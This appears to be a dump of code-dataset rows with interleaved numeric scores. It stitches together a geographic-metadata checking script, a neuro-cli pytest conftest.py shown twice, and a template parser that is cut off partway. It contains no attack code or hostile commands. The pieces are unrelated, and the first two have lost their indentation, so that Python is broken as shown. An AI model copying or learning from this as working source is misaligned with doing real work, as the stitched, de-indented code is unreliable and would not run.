'North America', 'Oceania', 'Grand princess cruise ship',
'diamond princess']
things_to_exclude = [x.lower() for x in things_to_exclude_orig]
all_metadatas = [pd.read_csv(met, delimiter='\t') for met in args.metadata]
metadata = pd.concat(all_metadatas, sort=False)
all_colors = [pd.read_csv(col, delimiter='\t', header=None) for col in args.colors]
colors = pd.concat(all_colors, sort=False)
latlong = pd.read_csv(args.latlong, delimiter='\t', header=None)
for geo_value in ['location', 'division', 'country']:
locs_w_color_orig = colors.loc[colors[0]==geo_value,1].values
locs_w_color = [x.lower() for x in locs_w_color_orig]
locs_w_latlong_orig = latlong.loc[latlong[0]==geo_value,1].values
locs_w_latlong = [x.lower() for x in locs_w_latlong_orig]
locs_in_meta_orig = [x for x in metadata[geo_value].unique() if not pd.isna(x)]
locs_in_meta = [x.lower() for x in locs_in_meta_orig]
missing_color_locs = [loc for loc in locs_in_meta if loc not in locs_w_color and loc not in things_to_exclude]
if missing_color_locs:
print("The following {} are missing colors:".format(geo_value))
print(missing_color_locs)
print("\n")
if geo_value != 'country':
missing_latlong_locs = [loc for loc in locs_in_meta if loc not in locs_w_latlong and loc not in things_to_exclude]
if missing_latlong_locs:
print("The following {} are missing lat-long values:".format(geo_value))
print(missing_latlong_locs)
print("\n")
print("Please remember this does *not* check lat-longs for countries!!") | 0.300951 | 0.21162 |
import dataclasses
import io
import logging
from collections import namedtuple
from decimal import Decimal
from difflib import ndiff
from pathlib import Path
from typing import Any, Callable, DefaultDict, Iterator, List, Optional, Set, Union
import click
import pytest
from rich.console import Console, RenderableType
from yarl import URL
from neuro_sdk import Cluster, Factory, Preset
from neuro_sdk._config import _AuthConfig, _AuthToken, _ConfigData
from neuro_cli import __version__
from neuro_cli.const import EX_OK
from neuro_cli.main import main
from neuro_cli.root import Root
from neuro_cli.utils import Command, Context
SysCapWithCode = namedtuple("SysCapWithCode", ["out", "err", "code"])
log = logging.getLogger(__name__)
@pytest.fixture()
def nmrc_path(tmp_path: Path, token: str, auth_config: _AuthConfig) -> Path:
nmrc_path = tmp_path / "conftest.nmrc"
cluster_config = Cluster(
registry_url=URL("https://registry-dev.neu.ro"),
storage_url=URL("https://storage-dev.neu.ro"),
users_url=URL("https://users-dev.neu.ro"),
monitoring_url=URL("https://monitoring-dev.neu.ro"),
secrets_url=URL("https://secrets-dev.neu.ro"),
disks_url=URL("https://disks-dev.neu.ro"),
buckets_url=URL("https://buckets-dev.neu.ro"),
presets={
"gpu-small": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=30 * 1024,
gpu=1,
gpu_model="nvidia-tesla-k80",
),
"gpu-large": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=60 * 1024,
gpu=1,
gpu_model="nvidia-tesla-v100",
),
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
"cpu-large": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=14 * 1024
),
},
name="default",
orgs=[None],
)
cluster2_config = Cluster(
registry_url=URL("https://registry2-dev.neu.ro"),
storage_url=URL("https://storage2-dev.neu.ro"),
users_url=URL("https://users2-dev.neu.ro"),
monitoring_url=URL("https://monitoring2-dev.neu.ro"),
secrets_url=URL("https://secrets2-dev.neu.ro"),
disks_url=URL("https://disks2-dev.neu.ro"),
buckets_url=URL("https://buckets2-dev.neu.ro"),
presets={
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
},
name="other",
orgs=[None],
)
config = _ConfigData(
auth_config=auth_config,
auth_token=_AuthToken.create_non_expiring(token),
url=URL("https://dev.neu.ro/api/v1"),
admin_url=URL("https://dev.neu.ro/apis/admin/v1"),
version=__version__,
cluster_name=cluster_config.name,
org_name=cluster_config.orgs[0],
clusters={
cluster_config.name: cluster_config,
cluster2_config.name: cluster2_config,
},
)
Factory(nmrc_path)._save(config)
return nmrc_path
def create_root(config_path: Path) -> Root:
async def cmd() -> None:
pass
return Root(
color=False,
tty=False,
disable_pypi_version_check=True,
network_timeout=60,
config_path=config_path,
verbosity=0,
trace=False,
trace_hide_token=True,
force_trace_all=False,
command_path="",
command_params=[],
skip_gmp_stats=True,
show_traceback=False,
iso_datetime_format=False,
ctx=Context(Command(cmd, name="")),
)
@pytest.fixture()
def root(nmrc_path: Path) -> Iterator[Root]:
root = create_root(config_path=nmrc_path)
root.run(root.init_client())
yield root
root.close()
@pytest.fixture()
def root_no_logged_in(tmp_path: Path) -> Iterator[Root]:
root = create_root(config_path=tmp_path)
assert root._client is None
yield root
assert root._client is None
root.close()
@pytest.fixture()
def run_cli(
nmrc_path: Path, capfd: Any, tmp_path: Path
) -> Callable[[List[str]], SysCapWithCode]:
def _run_cli(arguments: List[str]) -> SysCapWithCode:
log.info("Run 'neuro %s'", " ".join(arguments))
capfd.readouterr()
code = EX_OK
try:
default_args = [
"--show-traceback",
"--disable-pypi-version-check",
"--color=no",
]
if "--neuromation-config" not in arguments:
for arg in arguments:
if arg.startswith("--neuromation-config="):
break
else:
default_args.append(f"--neuromation-config={nmrc_path}")
main(default_args + arguments)
except SystemExit as e:
code = e.code
pass
out, err = capfd.readouterr()
return SysCapWithCode(out.strip(), err.strip(), code)
return _run_cli
@pytest.fixture()
def click_tty_emulation(monkeypatch: Any) -> None:
monkeypatch.setattr("click._compat.isatty", lambda stream: True)
@dataclasses.dataclass(eq=False)
class Guard:
arg: str
path: Path
def __eq__(self, other: object) -> bool:
if not isinstance(other, Guard):
return NotImplemented
return [s.rstrip() for s in self.arg.splitlines()] == [
s.rstrip() for s in other.arg.splitlines()
]
class RichComparator:
def __init__(self, config: Any) -> None:
self._regen = config.getoption("--rich-gen")
self._config = config
self._reporter = config.pluginmanager.getplugin("terminalreporter")
assert self._reporter is not None
self._cwd = Path.cwd()
self._written_refs: List[Path] = []
self._checked_refs: Set[Path] = set()
self._file_pos = DefaultDict[io.StringIO, int](int)
def mkref(self, request: Any, index: Optional[int]) -> Path:
folder = Path(request.fspath).parent
basename = request.function.__qualname__
if hasattr(request.node, "callspec"):
parametrize_id = request.node.callspec.id
# Some characters are forbidden in FS path (on Windows)
bad_to_good = {
"/": "#forward_slash#",
"\\": "#back_slash#",
"<": "#less#",
">": "#more#",
":": "#colon#",
'"': "#double_qoute#",
"|": "#vertical_bar#",
"?": "#question_mark#",
"*": "#star#",
}
for bad, good in bad_to_good.items():
parametrize_id = parametrize_id.replace(bad, good)
# On windows, some characters are forbidden
basename += f"[{parametrize_id}]"
if index is not None:
basename += "_" + str(index)
basename += ".ref"
return folder / "ascii" / basename
def rel(self, ref: Path) -> Path:
return ref.relative_to(self._cwd)
def check_io(self, ref: Path, file: io.StringIO) -> None:
__tracebackhide__ = True
tmp = file.getvalue()
buf = tmp[self._file_pos[file] :]
self._file_pos[file] = len(tmp)
self.check(ref, buf)
def check(self, ref: Path, buf: str) -> None:
__tracebackhide__ = True
if ref in self._checked_refs:
pytest.fail(
f"{self.rel(ref)} is already checked. "
"Hint: use index when generating refs automatically"
)
else:
self._checked_refs.add(ref)
buf = buf.strip()
buf = click.unstyle(buf)
if self._regen:
self.write_ref(ref, buf)
else:
orig = self.read_ref(ref)
tmp = ref.with_suffix(".orig")
self.write_file(tmp, buf)
# reading from file is important, file writer replaces \r with \n
actual = self.read_file(tmp)
assert Guard(actual, tmp) == Guard(orig, ref)
def read_file(self, ref: Path) -> str:
return ref.read_text(encoding="utf8").strip()
def read_ref(self, ref: Path) -> str:
__tracebackhide__ = True
if not ref.exists():
rel_ref = self.rel(ref)
pytest.fail(
f"The reference {rel_ref} doesn't exist.\n"
"Create it yourself or run pytest with '--rich-gen' option."
)
else:
return self.read_file(ref)
def write_file(self, ref: Path, buf: str) -> None:
ref.parent.mkdir(parents=True, exist_ok=True)
ref.write_text(buf.strip() + "\n", encoding="utf8")
def write_ref(self, ref: Path, buf: str) -> bool:
if ref.exists():
orig = ref.read_text().strip()
if orig == buf:
return False
self.write_file(ref, buf)
if self._reporter.verbosity > 0:
rel_ref = self.rel(ref)
self._reporter.write_line(f"Regenerate {rel_ref}", yellow=True)
self._written_refs.append(ref)
return True
def summary(self) -> None:
if self._reporter.verbosity == 0:
if self._written_refs:
self._reporter.write_line("Regenerated files:", yellow=True)
for fname in self._written_refs:
rel_ref = self.rel(fname)
self._reporter.write_line(f" {rel_ref}", yellow=True)
def diff(self, lft: Guard, rgt: Guard) -> List[str]:
# The same as _diff_text from
# pytest/assertion/util.py#L200-L245
# plus a few extra lines with additional instructions.
explanation: List[str] = []
left = lft.arg
right = rgt.arg
if self._reporter.verbosity < 1:
i = 0 # just in case left or right has zero length
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
break
if i > 42:
i -= 10 # Provide some context
explanation = [
"Skipping %s identical leading characters in diff, use -v to show"
% i
]
left = left[i:]
right = right[i:]
if len(left) == len(right):
for i in range(len(left)):
if left[-i] != right[-i]:
break
if i > 42:
i -= 10 # Provide some context
explanation += [
"Skipping {} identical trailing "
"characters in diff, use -v to show".format(i)
]
left = left[:-i]
right = right[:-i]
keepends = True
if left.isspace() or right.isspace():
left = repr(str(left))
right = repr(str(right))
explanation += [
"Strings contain only whitespace, escaping them using repr()"
]
# "right" is the expected base against which we compare "left",
# see https://github.com/pytest-dev/pytest/issues/3333
explanation += [
line.strip("\n")
for line in ndiff(right.splitlines(keepends), left.splitlines(keepends))
]
explanation.append("")
explanation.append(f"'cat {self.rel(lft.path)}' to see the test output.")
explanation.append(f"'cat {self.rel(rgt.path)}' to see the reference.")
explanation.append(
f"Use 'pytest ... --rich-gen' to regenerate reference files "
"from values calculated by tests"
)
return explanation
def pytest_assertrepr_compare(
config: Any, op: str, left: object, right: object
) -> Optional[List[str]]:
if isinstance(left, Guard) and isinstance(right, Guard):
plugin = config.pluginmanager.getplugin("rich-comparator")
return plugin.diff(left, right)
return None
# run after terminalreporter/capturemanager are configured
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Any) -> None:
comparator = RichComparator(config)
config.pluginmanager.register(comparator, "rich-comparator")
def pytest_terminal_summary(terminalreporter: Any) -> None:
config = terminalreporter.config
comparator = config.pluginmanager.getplugin("rich-comparator")
comparator.summary()
@pytest.fixture
def rich_cmp(request: Any) -> Callable[..., None]:
def comparator(
src: Union[RenderableType, Console],
ref: Optional[Path] = None,
*,
color: bool = True,
tty: bool = True,
index: Optional[int] = 0,
) -> None:
__tracebackhide__ = True
plugin = request.config.pluginmanager.getplugin("rich-comparator")
if ref is None:
ref = plugin.mkref(request, index)
if isinstance(src, io.StringIO):
plugin.check_io(ref, src)
elif isinstance(src, Console):
if isinstance(src.file, io.StringIO):
plugin.check_io(ref, src.file)
else:
buf = src.export_text(clear=True, styles=True)
plugin.check(ref, buf)
else:
file = io.StringIO()
console = Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
)
console.print(src)
plugin.check_io(ref, file)
return comparator
NewConsole = Callable[..., Console]
@pytest.fixture
def new_console() -> NewConsole:
def factory(*, tty: bool, color: bool = True) -> Console:
file = io.StringIO()
# console doesn't accept the time source,
# using the real time in tests is not reliable
return Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
log_path=False,
log_time=False,
)
return factory | neuro-cli/tests/unit/conftest.py | import dataclasses
import io
import logging
from collections import namedtuple
from decimal import Decimal
from difflib import ndiff
from pathlib import Path
from typing import Any, Callable, DefaultDict, Iterator, List, Optional, Set, Union
import click
import pytest
from rich.console import Console, RenderableType
from yarl import URL
from neuro_sdk import Cluster, Factory, Preset
from neuro_sdk._config import _AuthConfig, _AuthToken, _ConfigData
from neuro_cli import __version__
from neuro_cli.const import EX_OK
from neuro_cli.main import main
from neuro_cli.root import Root
from neuro_cli.utils import Command, Context
SysCapWithCode = namedtuple("SysCapWithCode", ["out", "err", "code"])
log = logging.getLogger(__name__)
@pytest.fixture()
def nmrc_path(tmp_path: Path, token: str, auth_config: _AuthConfig) -> Path:
nmrc_path = tmp_path / "conftest.nmrc"
cluster_config = Cluster(
registry_url=URL("https://registry-dev.neu.ro"),
storage_url=URL("https://storage-dev.neu.ro"),
users_url=URL("https://users-dev.neu.ro"),
monitoring_url=URL("https://monitoring-dev.neu.ro"),
secrets_url=URL("https://secrets-dev.neu.ro"),
disks_url=URL("https://disks-dev.neu.ro"),
buckets_url=URL("https://buckets-dev.neu.ro"),
presets={
"gpu-small": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=30 * 1024,
gpu=1,
gpu_model="nvidia-tesla-k80",
),
"gpu-large": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=60 * 1024,
gpu=1,
gpu_model="nvidia-tesla-v100",
),
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
"cpu-large": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=14 * 1024
),
},
name="default",
orgs=[None],
)
cluster2_config = Cluster(
registry_url=URL("https://registry2-dev.neu.ro"),
storage_url=URL("https://storage2-dev.neu.ro"),
users_url=URL("https://users2-dev.neu.ro"),
monitoring_url=URL("https://monitoring2-dev.neu.ro"),
secrets_url=URL("https://secrets2-dev.neu.ro"),
disks_url=URL("https://disks2-dev.neu.ro"),
buckets_url=URL("https://buckets2-dev.neu.ro"),
presets={
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
},
name="other",
orgs=[None],
)
config = _ConfigData(
auth_config=auth_config,
auth_token=_AuthToken.create_non_expiring(token),
url=URL("https://dev.neu.ro/api/v1"),
admin_url=URL("https://dev.neu.ro/apis/admin/v1"),
version=__version__,
cluster_name=cluster_config.name,
org_name=cluster_config.orgs[0],
clusters={
cluster_config.name: cluster_config,
cluster2_config.name: cluster2_config,
},
)
Factory(nmrc_path)._save(config)
return nmrc_path
def create_root(config_path: Path) -> Root:
async def cmd() -> None:
pass
return Root(
color=False,
tty=False,
disable_pypi_version_check=True,
network_timeout=60,
config_path=config_path,
verbosity=0,
trace=False,
trace_hide_token=True,
force_trace_all=False,
command_path="",
command_params=[],
skip_gmp_stats=True,
show_traceback=False,
iso_datetime_format=False,
ctx=Context(Command(cmd, name="")),
)
@pytest.fixture()
def root(nmrc_path: Path) -> Iterator[Root]:
root = create_root(config_path=nmrc_path)
root.run(root.init_client())
yield root
root.close()
@pytest.fixture()
def root_no_logged_in(tmp_path: Path) -> Iterator[Root]:
root = create_root(config_path=tmp_path)
assert root._client is None
yield root
assert root._client is None
root.close()
@pytest.fixture()
def run_cli(
nmrc_path: Path, capfd: Any, tmp_path: Path
) -> Callable[[List[str]], SysCapWithCode]:
def _run_cli(arguments: List[str]) -> SysCapWithCode:
log.info("Run 'neuro %s'", " ".join(arguments))
capfd.readouterr()
code = EX_OK
try:
default_args = [
"--show-traceback",
"--disable-pypi-version-check",
"--color=no",
]
if "--neuromation-config" not in arguments:
for arg in arguments:
if arg.startswith("--neuromation-config="):
break
else:
default_args.append(f"--neuromation-config={nmrc_path}")
main(default_args + arguments)
except SystemExit as e:
code = e.code
pass
out, err = capfd.readouterr()
return SysCapWithCode(out.strip(), err.strip(), code)
return _run_cli
@pytest.fixture()
def click_tty_emulation(monkeypatch: Any) -> None:
monkeypatch.setattr("click._compat.isatty", lambda stream: True)
@dataclasses.dataclass(eq=False)
class Guard:
arg: str
path: Path
def __eq__(self, other: object) -> bool:
if not isinstance(other, Guard):
return NotImplemented
return [s.rstrip() for s in self.arg.splitlines()] == [
s.rstrip() for s in other.arg.splitlines()
]
class RichComparator:
def __init__(self, config: Any) -> None:
self._regen = config.getoption("--rich-gen")
self._config = config
self._reporter = config.pluginmanager.getplugin("terminalreporter")
assert self._reporter is not None
self._cwd = Path.cwd()
self._written_refs: List[Path] = []
self._checked_refs: Set[Path] = set()
self._file_pos = DefaultDict[io.StringIO, int](int)
def mkref(self, request: Any, index: Optional[int]) -> Path:
folder = Path(request.fspath).parent
basename = request.function.__qualname__
if hasattr(request.node, "callspec"):
parametrize_id = request.node.callspec.id
# Some characters are forbidden in FS path (on Windows)
bad_to_good = {
"/": "#forward_slash#",
"\\": "#back_slash#",
"<": "#less#",
">": "#more#",
":": "#colon#",
'"': "#double_qoute#",
"|": "#vertical_bar#",
"?": "#question_mark#",
"*": "#star#",
}
for bad, good in bad_to_good.items():
parametrize_id = parametrize_id.replace(bad, good)
# On windows, some characters are forbidden
basename += f"[{parametrize_id}]"
if index is not None:
basename += "_" + str(index)
basename += ".ref"
return folder / "ascii" / basename
def rel(self, ref: Path) -> Path:
return ref.relative_to(self._cwd)
def check_io(self, ref: Path, file: io.StringIO) -> None:
__tracebackhide__ = True
tmp = file.getvalue()
buf = tmp[self._file_pos[file] :]
self._file_pos[file] = len(tmp)
self.check(ref, buf)
def check(self, ref: Path, buf: str) -> None:
__tracebackhide__ = True
if ref in self._checked_refs:
pytest.fail(
f"{self.rel(ref)} is already checked. "
"Hint: use index when generating refs automatically"
)
else:
self._checked_refs.add(ref)
buf = buf.strip()
buf = click.unstyle(buf)
if self._regen:
self.write_ref(ref, buf)
else:
orig = self.read_ref(ref)
tmp = ref.with_suffix(".orig")
self.write_file(tmp, buf)
# reading from file is important, file writer replaces \r with \n
actual = self.read_file(tmp)
assert Guard(actual, tmp) == Guard(orig, ref)
def read_file(self, ref: Path) -> str:
return ref.read_text(encoding="utf8").strip()
def read_ref(self, ref: Path) -> str:
__tracebackhide__ = True
if not ref.exists():
rel_ref = self.rel(ref)
pytest.fail(
f"The reference {rel_ref} doesn't exist.\n"
"Create it yourself or run pytest with '--rich-gen' option."
)
else:
return self.read_file(ref)
def write_file(self, ref: Path, buf: str) -> None:
ref.parent.mkdir(parents=True, exist_ok=True)
ref.write_text(buf.strip() + "\n", encoding="utf8")
def write_ref(self, ref: Path, buf: str) -> bool:
if ref.exists():
orig = ref.read_text().strip()
if orig == buf:
return False
self.write_file(ref, buf)
if self._reporter.verbosity > 0:
rel_ref = self.rel(ref)
self._reporter.write_line(f"Regenerate {rel_ref}", yellow=True)
self._written_refs.append(ref)
return True
def summary(self) -> None:
if self._reporter.verbosity == 0:
if self._written_refs:
self._reporter.write_line("Regenerated files:", yellow=True)
for fname in self._written_refs:
rel_ref = self.rel(fname)
self._reporter.write_line(f" {rel_ref}", yellow=True)
def diff(self, lft: Guard, rgt: Guard) -> List[str]:
# The same as _diff_text from
# pytest/assertion/util.py#L200-L245
# plus a few extra lines with additional instructions.
explanation: List[str] = []
left = lft.arg
right = rgt.arg
if self._reporter.verbosity < 1:
i = 0 # just in case left or right has zero length
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
break
if i > 42:
i -= 10 # Provide some context
explanation = [
"Skipping %s identical leading characters in diff, use -v to show"
% i
]
left = left[i:]
right = right[i:]
if len(left) == len(right):
for i in range(len(left)):
if left[-i] != right[-i]:
break
if i > 42:
i -= 10 # Provide some context
explanation += [
"Skipping {} identical trailing "
"characters in diff, use -v to show".format(i)
]
left = left[:-i]
right = right[:-i]
keepends = True
if left.isspace() or right.isspace():
left = repr(str(left))
right = repr(str(right))
explanation += [
"Strings contain only whitespace, escaping them using repr()"
]
# "right" is the expected base against which we compare "left",
# see https://github.com/pytest-dev/pytest/issues/3333
explanation += [
line.strip("\n")
for line in ndiff(right.splitlines(keepends), left.splitlines(keepends))
]
explanation.append("")
explanation.append(f"'cat {self.rel(lft.path)}' to see the test output.")
explanation.append(f"'cat {self.rel(rgt.path)}' to see the reference.")
explanation.append(
f"Use 'pytest ... --rich-gen' to regenerate reference files "
"from values calculated by tests"
)
return explanation
def pytest_assertrepr_compare(
config: Any, op: str, left: object, right: object
) -> Optional[List[str]]:
if isinstance(left, Guard) and isinstance(right, Guard):
plugin = config.pluginmanager.getplugin("rich-comparator")
return plugin.diff(left, right)
return None
# run after terminalreporter/capturemanager are configured
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Any) -> None:
comparator = RichComparator(config)
config.pluginmanager.register(comparator, "rich-comparator")
def pytest_terminal_summary(terminalreporter: Any) -> None:
config = terminalreporter.config
comparator = config.pluginmanager.getplugin("rich-comparator")
comparator.summary()
@pytest.fixture
def rich_cmp(request: Any) -> Callable[..., None]:
def comparator(
src: Union[RenderableType, Console],
ref: Optional[Path] = None,
*,
color: bool = True,
tty: bool = True,
index: Optional[int] = 0,
) -> None:
__tracebackhide__ = True
plugin = request.config.pluginmanager.getplugin("rich-comparator")
if ref is None:
ref = plugin.mkref(request, index)
if isinstance(src, io.StringIO):
plugin.check_io(ref, src)
elif isinstance(src, Console):
if isinstance(src.file, io.StringIO):
plugin.check_io(ref, src.file)
else:
buf = src.export_text(clear=True, styles=True)
plugin.check(ref, buf)
else:
file = io.StringIO()
console = Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
)
console.print(src)
plugin.check_io(ref, file)
return comparator
NewConsole = Callable[..., Console]
@pytest.fixture
def new_console() -> NewConsole:
def factory(*, tty: bool, color: bool = True) -> Console:
file = io.StringIO()
# console doesn't accept the time source,
# using the real time in tests is not reliable
return Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
log_path=False,
log_time=False,
)
return factory | 0.610918 | 0.205456 |
import inspect
import io
from abc import ABCMeta, abstractmethod
from PySide.QtGui import QApplication
if __package__:
from . import functions
else:
import functions
class TemplateError(Exception):
pass
class Renderable(metaclass=ABCMeta):
@abstractmethod
def render(self, context):
pass
class Text(Renderable):
def __init__(self, text):
self.text = text
def render(self, context):
return self.text
def __repr__(self):
return repr(self.text)
class Variable(Renderable):
def __init__(self, name):
self.name = name
def render(self, context):
return context.get(self.name, '')
def __repr__(self):
return 'Variable: %s' % self.name
class Block(Renderable):
    """Sequence node: renders each child in order and concatenates."""
    def __init__(self):
        self.elements = []
    def append(self, elem):
        self.elements.append(elem)
    def isempty(self):
        # True when no child nodes have been appended.
        return not self.elements
    def render(self, context):
        parts = [e.render(context) for e in self.elements]
        return ''.join(parts)
    def __repr__(self):
        return '\n'.join(map(repr, self.elements))
class BaseFunction(Renderable):
    """Function-call node: evaluates its argument Blocks, then applies the
    wrapped callable. Subclasses tweak how arguments are delivered."""
    def __init__(self, function, args):
        self.function = function
        self.args = args
    def get_arg(self, arg, context):
        # Eager evaluation: render one argument Block to a string.
        return arg.render(context)
    def get_args(self, context):
        return [self.get_arg(a, context) for a in self.args]
    def render(self, context):
        return self.function(*self.get_args(context))
    def __repr__(self):
        return (self.__class__.__name__ + ': ' + self.function.__name__ + '(\n ' +
            ',\n'.join(repr(a) for a in self.args).replace('\n', '\n ') + '\n)')
class Function(BaseFunction):
    """Plain template function: arguments are rendered eagerly."""
    pass
class LazyFunction(BaseFunction):
    """Template function whose arguments arrive as zero-argument callables,
    letting the function decide whether/when to evaluate each one."""
    def get_arg(self, arg, context):
        # super() is captured eagerly via the default argument: the lambda
        # itself cannot use the zero-argument super() form.
        return lambda s=super(): s.get_arg(arg, context)
class ContextFunction(BaseFunction):
    """Template function that receives the render context as its first
    (implicit) argument."""
    def get_args(self, context):
        return [context] + super().get_args(context)
class LazyContextFunction(ContextFunction, LazyFunction):
    """Context-receiving function with lazily evaluated arguments.

    The MRO combines ContextFunction.get_args with LazyFunction.get_arg.
    """
    pass
class FunctionRepo:
    """Registry of template functions discovered in Python modules.

    Functions are picked up by name prefix: ``f_`` (plain), ``lazy_``,
    ``context_`` and ``lazycontext_``; the prefix selects the node class
    used for calls and is stripped from the template-visible name.  Each
    entry maps name -> (callable, node class, min_args, max_args), where
    max_args is None for *args functions and both counts exclude the
    implicit context argument of context functions.
    """
    def __init__(self, modules, parent=None):
        self.parent = parent
        self.data = {}
        for module in modules:
            for name in dir(module):
                function = getattr(module, name)
                if name.startswith('f_'):
                    cls = Function
                    name = name[2:]
                elif name.startswith('lazy_'):
                    cls = LazyFunction
                    name = name[5:]
                elif name.startswith('context_'):
                    cls = ContextFunction
                    name = name[8:]
                elif name.startswith('lazycontext_'):
                    cls = LazyContextFunction
                    name = name[12:]
                else:
                    continue
                min_args, max_args = self._count_args(function, name, module)
                if cls == ContextFunction or cls == LazyContextFunction:
                    if max_args is not None and max_args < 1:
                        raise TemplateError("Context function must accept at least one argument: "
                                            "function '%s' from %r" % (name, module))
                    # Exclude the implicit context argument from both bounds.
                    # (Fixed: the old code clamped min_args to 1 instead of
                    # subtracting one, and crashed on None max_args.)
                    min_args = max(min_args - 1, 0)
                    if max_args is not None:
                        max_args -= 1
                self.data[name] = (function, cls, min_args, max_args)

    @staticmethod
    def _count_args(function, name, module):
        """Return (min_args, max_args) for *function*; max_args is None
        when the function accepts *args.  Raises TemplateError for
        unusable signatures."""
        min_args = 0
        max_args = 0
        try:
            sig = inspect.signature(function)
        except ValueError:
            raise TemplateError("Can't obtain signature for function '%s' from %r" % (name, module))
        for p in sig.parameters.values():
            if (p.kind == inspect.Parameter.POSITIONAL_ONLY or
                    p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD):
                if max_args is not None:
                    max_args += 1
                if p.default == inspect.Parameter.empty:
                    min_args += 1
            elif p.kind == inspect.Parameter.VAR_POSITIONAL:
                max_args = None
            elif (p.kind == inspect.Parameter.KEYWORD_ONLY and
                    p.default == inspect.Parameter.empty):
                raise TemplateError("Required keyword-only arguments are not allowed: "
                                    "function '%s' from %r" % (name, module))
        return min_args, max_args

    def get(self, name):
        """Look up *name*, falling back to the parent repository; returns
        (function, cls, min_args, max_args), all None when unknown."""
        data = self.data.get(name, None)
        if data is None:
            if self.parent is None:
                data = (None, None, None, None)
            else:
                data = self.parent.get(name)
        return data
# Shared repository of the built-in template functions; used as the
# fallback parent for per-Template repositories.
std_function_repo = FunctionRepo([functions])
class Parser:
    """Recursive-descent parser for the template mini-language.

    ``%name%`` renders a variable, ``$name(arg1,arg2,...)`` calls a
    registered function (arguments are nested blocks), a backslash
    escapes the following character; everything else is literal text.
    """
    VAR = '%'
    FUNC = '$'
    FUNC_START = '('
    FUNC_COMMA = ','
    FUNC_END = ')'
    ESC = '\\'
    def __init__(self, source, function_repo):
        self.source = source
        self._function_repo = function_repo
        self._pos = -1
        self._line = 1
        self._col = 0
    def _get(self):
        """Consume and return the next character, or None at end of input."""
        self._oldpos = self._pos
        self._oldcol = self._col
        self._oldline = self._line
        self._pos += 1
        self._col += 1
        if self._pos >= len(self.source):
            return None
        c = self.source[self._pos]
        if c == '\n':
            self._line += 1
            self._col = 0
        return c
    def _unget(self):
        """Push the last character back (one step of lookahead)."""
        assert self._pos >= 0
        self._pos = self._oldpos
        self._col = self._oldcol
        self._line = self._oldline
    def _parse_identifier(self):
        """Read a run of [A-Za-z0-9_] characters (possibly empty)."""
        s = io.StringIO()
        while True:
            c = self._get()
            if c is None:
                # EOF must be handled before the range comparisons below:
                # comparing None with str raises TypeError (this previously
                # crashed on input ending right after an identifier).
                return s.getvalue()
            elif 'a' <= c <= 'z' or 'A' <= c <= 'Z' or '0' <= c <= '9' or c == '_':
                s.write(c)
            else:
                self._unget()
                return s.getvalue()
    def _parse_text(self, as_argument=False):
        """Read literal text up to the next markup character (or EOF)."""
        s = io.StringIO()
        while True:
            c = self._get()
            if c is None:
                return Text(s.getvalue())
            elif c == self.VAR or c == self.FUNC or (
                    as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END)):
                self._unget()
                return Text(s.getvalue())
            elif c == self.ESC:
                # Backslash escapes the next character; a trailing
                # backslash at EOF is silently dropped.
                c = self._get()
                if c is not None:
                    s.write(c)
            else:
                s.write(c)
    def _parse_var(self):
        """Parse ``name%`` of a variable (the leading % is already consumed)."""
        name = self._parse_identifier()
        if name == '':
            raise self._error('Syntax error: empty variable name')
        c = self._get()
        if c != self.VAR:
            raise self._error('Syntax error: undelimited variable')
        return Variable(name)
    def _parse_block(self, as_argument=False):
        """Parse a sequence of text/variable/function nodes into a Block."""
        elems = Block()
        while True:
            c = self._get()
            if c is None:
                return elems
            elif c == self.VAR:
                elems.append(self._parse_var())
            elif c == self.FUNC:
                elems.append(self._parse_func())
            elif as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END):
                self._unget()
                return elems
            else:
                self._unget()
                elems.append(self._parse_text(as_argument))
    def _parse_func(self):
        """Parse ``name(arg,...)`` (the leading $ is already consumed) and
        validate the call against the function repository."""
        name = self._parse_identifier()
        if name == '':
            raise self._error('Syntax error: empty function name')
        c = self._get()
        if c != self.FUNC_START:
            raise self._error("Syntax error: expected '('")
        args = []
        while True:
            args.append(self._parse_block(True))
            c = self._get()
            if c == self.FUNC_END:
                break
            elif c != self.FUNC_COMMA:
                raise self._error("Syntax error: expected ',' or ')'")
        # '$f()' parses as a single empty argument; treat as zero arguments.
        if len(args) == 1 and args[0].isempty():
            args = []
        f, NodeClass, min_args, max_args = self._function_repo.get(name)
        if f is None:
            raise self._error("Unknown function: '%s'" % name)
        if len(args) < min_args:
            raise self._error("Function '%s' expects at least %d arguments, "
                              "%d given" % (name, min_args, len(args)))
        if max_args is not None and len(args) > max_args:
            raise self._error("Function '%s' expects at most %d arguments, "
                              "%d given" % (name, max_args, len(args)))
        return NodeClass(f, args)
    def parse(self):
        """Parse the whole source and return the root Block node."""
        return self._parse_block()
    def _error(self, msg):
        # Returned, not raised, so call sites read `raise self._error(...)`.
        # NOTE(review): self._line/_col are tracked but not reported here.
        return TemplateError(msg)
class Template(Renderable):
    """A parsed template; render() evaluates it against a context dict."""
    # Defaults injected into every render context. __timefmt__ holds three
    # translated duration formats (presumably days / hours / minutes
    # granularity variants -- confirm against the duration-formatting code).
    std_vars = {
